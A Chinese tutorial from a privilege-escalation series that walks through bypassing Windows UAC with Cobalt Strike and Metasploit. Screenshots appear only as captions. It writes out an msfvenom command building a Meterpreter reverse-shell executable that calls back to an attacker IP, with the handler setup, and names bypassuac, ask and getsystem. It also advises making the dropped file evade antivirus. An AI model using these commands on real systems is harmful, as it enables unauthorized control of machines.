系列文章

操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!

MSF和CS绕过UAC提权

CS绕过UAC提权

拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_windows

执行添加用户的命令时显示拒绝访问

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_system权限_02


使用CS自带的插件进行绕过提权

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_安全_03


直接提到了system权限

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_windows_04


操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_安全_05

提权后可以完成添加用户的命令

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_安全_06

MSF绕过UAC

bypassuac模块

使用该模块提权的使用,当前用户必须是管理员组中的用户,UAC为默认设置

生成一个MSF的SHELL

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=3333 -f exe -o test.exe 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 3333
exploit

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_system权限_07

getuid

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_安全_08

试一下getsystem发现失败

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_安全_09

msf搜索 bypassuac 得到很多模块

search bypassuac

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_安全_10

使用一个模块试一试

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_网络_11

RUNAS模块绕过UAC

该模块会创建一个可执行文件,目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system权限的shell

这个模块对用户没有要求,点击通过即可,但是会创建一个恶意文件,对该文件进行免杀即可

use exploit/windows/local/ask

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_网络_12

用户点击后直接获取高权限

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_system权限_13